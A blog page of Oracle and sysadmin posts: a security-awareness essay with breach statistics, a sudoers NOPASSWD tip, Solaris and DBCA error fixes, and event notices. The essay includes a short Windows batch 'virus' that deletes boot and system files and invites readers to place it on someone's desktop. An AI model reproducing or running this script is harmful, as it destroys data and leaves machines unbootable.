Me, Security & Oracle

Lot of question came to my mind when I start talking about oracle security, How to secure my databases, what should I do?
Adding Firewall to my network is it enough? Enable Oracle Audit Parameter will be enough?
Understand Security as concept is very important to reduce risk of attack and to do that you should make your system is secure.
Having Security awareness is first step to secure the system.

According to RSA reports, there was 7% increase in amount of phishing attacks worldwide between months of July and August 2010, The United States currently leads as the country that suffered the most attacks in regards to online cyber threats with 35% of these aimed at citizens of the US; the US was also the country that hosted the most attacks, with 60% of phishing attacks starting from the US.
The below Graph Show Number of network Security Breaches over Past 12 months (Graph Made by Ponemon Institute)
Included to above reports 1$ trillion the total value of intellectual property hackers stole from business around the world in 2008.
As proof for this I will mention three different stories for the biggest top “black hat” hackers
The below Graph Shown How much Did the Cyber-attack Cost Company over 12 month (Graph Made by Ponemon Institute)
Jonathan James when he hacked NASA he was 16 years old with that he was the first juvenile sent to the present, Installed backdoor into defense threats reductions agency server and  jacked into NASA Computers stealing software worth 1.7M $ Costing NASA 41,000$ in Repair.
Adrian Lamo Hacked into NY Times and Microsoft using wifi Coffee shop, Viewed Personal Information and High profile Subject matter
The last example Kevin Mitnick spent two years stealing corporate secrets and breaking into the US national defense warning system.
Computer Hacking is usually used as stereotypes in movies and cartoons as Guy sitting behind desk with Pepsi Can and not that much luck with ladies , the truth is this guy cost people and companies money and privacy, therefor the hacking effects on individuals , organizations and company.
As individuals victims of computer hacking will lose their saving, privacy even their life, in the early days of computer the virus was the biggest security risk which is cause data losing. After that it’s replaced with malware which is small software designed to do job such as key logger or virus scanner but now this software not more any fun since the hackers now creating malware.
Nothing easier today than writing virus just to do annoying things, the below code just an example how writing a virus.
You can find step to write virus, Trojan or even worm on the internet and for free, this is what makes problem bigger, because internal user can read this information and start using them so you should prepare to all these kind of attacks.
The below example for simple virus, all you have to do is save as batch file and put it on someone desktop

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
msg * SEND->> JOIN EVILKING TO +962795238146 for hacking tricks

 What if the victims was company or organization, the small effect could happened by hacker is put some employees out of works for short period of time. The large affect hacker could stole company secrets and lose them data, and make some damage, the last survey for Ponemon Research on behalf of juniper Networks 90% of companies had been breached at least once by hackers over the past 12 months.60% reported two or more breaches over the past year.

So companies or organizations should spend small fortune for security purpose software and hardware and lets us don’t forget to educate our employee.
The Security today consider as most important priority for the company for two reasons:
1-      Personal Data protections.
If you store data you should secure these data, since it’s related to customers or clients.
2-      Social Responsibility. 

Some of these data very important and contain people privacy which indicate us that company should protect these information by secure their systems.
When you leave your house for works purpose in the morning or hanging out with friends in the evening you make sure that your house is secure why? All this to keep unauthorized people to access, damage and theft By enable alarm system, make sure your doors is lock and even your windows, this is the same for the companies or organizations same principle but with different approach, the valuable things in the computers and networks is the data you create, this is the first reasons why we have computers and networks. 
Operating system can be reinstalled, Hardware can be replaced but we talking about data which is unique and sometimes it is irreplaceable.
Data is confidential and people privacy, this is the main reason why you don’t want lose it, you don’t want others to even view it without authorization , Visa information, mobile numbers, social numbers and account numbers.
If it’s left unprotected then information can be accessed by anyone, if these information fall into wrong hand, you’re live is nightmare, quite often ensure your data is protected is small price that you could pay to avoid future problems and prevent threats.
What if the data is not adequately protected, perhaps it compromised which called security breach, I am not talking here as individual level but as Business level that cause problems such as loss of reputation and lawsuits.
According to the Ponemon institute, cost of a Security breach during 2008 was $202 per record breached. Imagine if you have 1 Million records what is could cause to the company?
Intruders not care who you are or about your identity they just want to control your computer. By doing this they can hide their location and start attack.
By access to the system intruders discovers new vulnerabilities to exploit in computer software, don’t forget its networks which mean you can access to another computers on same network Complex right?
But what about the law, all the above information is just reports and security principle, check the below law that talks about security and data privacy.
Cheers
Osama Mustafa

Use "sudo" Command without password Prompt

Sometimes you need to run Linux command without password prompt using sudo command.

to learn more about this command read the link here.

For Example i need to run the following command without password prompt, However there are three sudo commands I want to run without entering password:

  • sudo reboot
  • sudo shutdown -r now
  • sudo shutdown -P now
to do this follow the below steps :-
  • edit the following /etc/sudoers file.
  • you find the following lines depend on the username and hostname for the server.

user host = (root) NOPASSWD: /sbin/shutdown
user host = (root) NOPASSWD: /sbin/reboot

This will allow the user user to run the desired commands on host without entering a password. All other sudoed commands will still require a password.

Notes:

  • Always use the command visudo to edit the sudoers file to make sure you do not lock yourself out of the system for example 

sudo visudo -f /etc/sudoers.d/shutdown

  • Using /etc/sudoers.d instead of modifying /etc/sudoers, you could add the two lines to a new file in /etc/sudoers.d for example  /etc/sudoers.d/shutdown.
  • If you did not use visudo to edit your files and then accidentally messed up /etc/sudoers or messed up a file in /etc/sudoers.d then you will be locked out of sudo.to fix it use command pkexec.
Cheers
Osama Mustafa

/usr/ccs/bin/as: not found/No such file or directory on Solaris 11.2

While trying to install Oracle Database 12c on Solaris 11.2 the i faced the following the errors in the logs and dbca was unable to start :-

INFO: sh[2]: /usr/ccs/bin/as: not found [No such file or directory]
INFO: make: Fatal error:
INFO: *** Error code 127

The package developer/assembler comes with default installation, But  Solaris 11 package developer/assembler is not installed.

To install it: –

pkg install developer/assembler

and try again.

Cheers
Osama 

OTech Magazine – Summer 2015

OTech Magazine – Summer 2015 OTech Magazine issue Summer 2015 is the eighth issue of OTech Magazine – the independent Oracle technology magazine – . Our contributors are the best of the best of the Oracle atmosphere.

Osama Mustafa – Database Link From Oracle to MySQL
Read the full version of magazine here.
Thanks Douwe Pieter  for this amazing efforts.
Cheers
Osama Mustafa

Officially Fusion Middleware 11.1.1.9 Is Available to download

“Oracle Fusion Middleware is the leading business innovation platform for the enterprise and the cloud. It enables enterprises to create and run agile, intelligent business applications while maximizing IT efficiency through full utilization of modern hardware and software architectures. Solutions and products include Exalogic Elastic Cloud, data integration, business process management, business intelligence, identity management, Cloud application foundation, service-oriented architecture, WebCenter, and development tools.”

Oracle Fusion middleware 11.1.1.9 is now available to download :-

  • Oracle Business Intelligence Enterprise Edition
  • Oracle JDeveloper and Application Development Framework (ADF)
  • Oracle Business Process Management
  • Oracle SOA Suite
  • Oracle Data Integrator
  • Oracle User Messaging Service
  • Oracle Enterprise Scheduler
  • Oracle Event Processing
  • Oracle WebCenter Suite
  • Oracle Identity Management
  • Oracle Forms and Reports
  • Oracle WebTier
  • Oracle Application Architecture Foundation Pack
To download Documentation from here
To Install Products steps from here 
to Download products from here
Thank you 
Osama Mustafa

connection to database cannot be established – DBCA

Environment :-

Oracle Grid Infrastructure 11.2.0.4
Nodes # : 4
Operating system : Redhat 6.6

When trying to configure enterprise manager the following error appeared :-

Connection to the database cannot be established because the listener could be down. Please make sure that the service is registered with a listener and the listener is up.

The listener is up, VIP is working on all nodes without any issue when check dbca logs looking for more details i found this error :-

dbca trace in $ORACLE_BASE/cfgtoollogs/dbca.

ORA-1017: invalid username/password

Both was correct, because of this i recreate password file on all nodes and restart my operation it’s working without any issue this time.

Thanks
Osama Mustafa

OTN EMEA Tour 2015

For second time i will be glad to Join OTN EMEA Tour 2015 with others oracle experts who consume much time in the Oracle Community.

We will cover the following country :-

  • Portugal.
  • Jordan – Amman
  • Johannesburg
date                         location
May 21st 2015 Lisbon, Portugal
May 23rd 2015 Amman, Jordan
May 26th 2015 Johannesburg, South Africa
All the information you can find it here.
Please if you will join us in any country sign up.
Thanks
Osama Mustafa